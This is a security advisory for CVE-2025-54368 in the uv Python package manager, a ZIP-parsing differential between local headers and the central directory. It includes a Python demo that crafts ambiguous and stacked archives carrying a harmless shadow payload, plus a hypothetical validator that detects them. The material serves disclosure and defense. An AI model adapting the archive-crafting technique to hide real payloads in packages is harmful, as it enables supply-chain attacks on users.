PT-2025-32302 · Uv · Uv
Calebbrown · Published 2025-08-07 · Updated 2025-10-11
CVE-2025-54368
CVSS v4.0: 6.8 (Medium)
Vector: AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Name of the Vulnerable Software and Affected Versions
uv versions 0.8.5 and earlier
Description
uv is a Python package and project manager written in Rust. Versions 0.8.5 and earlier handled remote ZIP archives in a streaming fashion, reading local file headers sequentially without reconciling them against the archive's central directory. A ZIP archive has two descriptions of its contents: the sequence of local file headers, and the central directory at the end of the file, which is what most installers (including anything built on Python's zipfile module) use to locate entries. Because uv trusted the local headers alone, an attacker could craft an archive that extracts with legitimate contents on installers that follow the central directory and malicious contents on installers that read it sequentially, or a "stacked" archive (several complete ZIPs concatenated, each with its own central directory and end-of-central-directory record), which different installers resolve to different inner archives. Either shape lets an attacker target specific installers with a single artifact that looks benign to the others.
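The two archive shapes described above, as an added example that is neither uv's code nor the advisory's: a Python script that builds an archive whose local headers and central directory disagree, and a stacked archive, from constructed payloads, then reads each through a sequential local-header walk and through the standard library's central-directory reader to show that they disagree, and finally runs a hypothetical reconciliation check (validate_zip, not uv's implementation) that rejects both. The file name and payloads are constructed for the demo; the check covers stored entries without data descriptors only.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
LOCAL_FMT = "<IHHHHHIIIHH"          # 30-byte local file header
CENTRAL_FMT = "<IHHHHHHIIIHHHHHII"  # 46-byte central directory header
EOCD_FMT = "<IHHHHIIH"              # 22-byte end-of-central-directory record
DOS_DATE = ((2025 - 1980) << 9) | (1 << 5) | 1  # 2025-01-01; any valid DOS date works

# Constructed sample payloads (hypothetical): the entry a central-directory reader
# should see, and the entry a sequential reader is steered into.
NAME = b"pkg/__init__.py"
LEGIT = b"__version__ = '1.0'\n"
SHADOW = b"import os; os.system('echo shadow entry executed')\n"


def _local(name: bytes, data: bytes) -> bytes:
    # Stored (method 0) entry with CRC and both sizes present in the local header.
    return struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, 0, 0, DOS_DATE, zlib.crc32(data),
                       len(data), len(data), len(name), 0) + name + data


def _central(name: bytes, data: bytes, offset: int) -> bytes:
    return struct.pack(CENTRAL_FMT, CENTRAL_SIG, 20, 20, 0, 0, 0, DOS_DATE, zlib.crc32(data),
                       len(data), len(data), len(name), 0, 0, 0, 0, 0, offset) + name


def build_ambiguous_zip(name: bytes, shadow: bytes, legit: bytes) -> bytes:
    """Two local entries for the same name; the central directory lists only the second."""
    lh_shadow, lh_legit = _local(name, shadow), _local(name, legit)
    cd = _central(name, legit, offset=len(lh_shadow))
    cd_offset = len(lh_shadow) + len(lh_legit)
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1, len(cd), cd_offset, 0)
    return lh_shadow + lh_legit + cd + eocd


def zipfile_archive(name: bytes, data: bytes) -> bytes:
    """A well-formed single-entry archive written by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name.decode(), data)
    return buf.getvalue()


def build_stacked_zip(name: bytes, first: bytes, second: bytes) -> bytes:
    """Two complete archives concatenated: the last EOCD record wins for central-directory
    readers, while a reader starting at offset 0 meets the first archive's entries."""
    return zipfile_archive(name, first) + zipfile_archive(name, second)


def walk_local_headers(blob: bytes) -> list:
    """Streaming view: follow local file headers from offset 0 until another signature
    appears. Returns (offset, name, crc, compressed_size, uncompressed_size, data) tuples."""
    entries, pos = [], 0
    while pos + 30 <= len(blob):
        sig, _ver, flags, _method, _t, _d, crc, csize, usize, nlen, xlen = \
            struct.unpack_from(LOCAL_FMT, blob, pos)
        if sig != LOCAL_SIG:
            break
        if flags & 0x0008:  # data descriptor: sizes follow the data; out of scope here
            raise ValueError(f"entry at offset {pos} uses a data descriptor")
        name = blob[pos + 30:pos + 30 + nlen]
        start = pos + 30 + nlen + xlen
        entries.append((pos, name, crc, csize, usize, blob[start:start + csize]))
        pos = start + csize
    return entries


def read_via_central_directory(blob: bytes) -> dict:
    """What a central-directory reader (here the zipfile module) believes the archive holds."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {zi.filename: zf.read(zi) for zi in zf.infolist()}


def validate_zip(blob: bytes) -> list:
    """Hypothetical reconciliation check: every local header reached sequentially must match
    a central directory record at that offset, and vice versa. Empty list = consistent."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        central = {zi.header_offset: zi for zi in zf.infolist()}
    seen = set()
    for off, name, crc, csize, usize, _data in walk_local_headers(blob):
        zi = central.get(off)
        if zi is None:
            problems.append(f"local entry {name!r} at offset {off} is absent from the central directory")
            continue
        seen.add(off)
        if (zi.filename.encode(), zi.CRC, zi.compress_size, zi.file_size) != (name, crc, csize, usize):
            problems.append(f"local entry {name!r} at offset {off} disagrees with its central directory record")
    for off, zi in central.items():
        if off not in seen:
            problems.append(f"central directory entry {zi.filename!r} at offset {off} was never reached sequentially")
    return problems


if __name__ == "__main__":
    for label, blob in (("ambiguous", build_ambiguous_zip(NAME, SHADOW, LEGIT)),
                        ("stacked", build_stacked_zip(NAME, SHADOW, LEGIT)),
                        ("clean", zipfile_archive(NAME, LEGIT))):
        print(label, "central-directory view:", read_via_central_directory(blob))
        print(label, "sequential view:", [e[5] for e in walk_local_headers(blob)])
        print(label, "validation:", validate_zip(blob) or "consistent")
```

For both crafted archives the central-directory reader returns only LEGIT, while the sequential walk also meets SHADOW; the reconciliation pass flags the ambiguous archive because the shadow entry has no central directory record, and the stacked archive because the first archive's entries and the last archive's central directory never line up. A real validator additionally has to handle data descriptors, ZIP64 records and compressed entries, which this example deliberately leaves out.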
Recommendations
Upgrade to uv 0.8.6 or later. From 0.8.6 uv validates remote ZIP archives against their central directory and rejects archives with these inconsistencies.
The environment variable UV_INSECURE_NO_ZIP_VALIDATION=1 disables that validation and reverts to the previous behavior. It is a compatibility opt-out for archives that fail the new checks, not a workaround for this vulnerability: with it set, uv is again exposed to the issue described above.
Tags: Exploit · Fix · RCE
Affected Products: Uv